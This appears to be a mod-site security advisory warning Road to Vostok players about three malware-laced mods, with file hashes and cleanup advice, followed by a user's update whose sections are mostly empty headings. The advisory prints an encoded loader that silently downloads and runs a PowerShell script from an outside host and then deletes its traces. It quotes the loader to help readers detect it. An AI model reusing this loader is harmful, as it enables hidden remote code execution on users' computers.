If you had installed the following mods:
"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (If you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da)
Your PC is likely infected with a malware. Do a proper reset to your computer.
What are we gonna do next?
- We are going to look for moderators to look at new mods for RTV.
- We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.
What can you do
- Again if you are infected, factory reset your computer.
- Search for suspicious things in the mods you download (like "powershell")
These attacks all follow the same pattern, they execute a powershell script using some encoded URL:
[64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34] - Check file hash of the file you downloaded using: https://hash-file.online.
- Any mod containing powershell script without a good reason should be reported to moderators.
- Any mod that isn't open-source should be reported.
This message was written with the help of AI.
⚠️ Update regarding the infected mod (killcounter / Road to Vostok)
I want to give a clear update on what happened on my system and what I did step by step.
What happened
So yes:
👉 this was confirmed to be a malware loader
What I did immediately
Both scans:
👉 0 threats found
Additional checks
I also:
Result:
Security actions
After scanning:
Current situation
👉 Most likely scenario:
Important note
Even though my system is clean now:
My personal conclusion
Final takeaway
If you ran this mod:
Don’t ignore it just because nothing “seems” wrong.
Stay safe.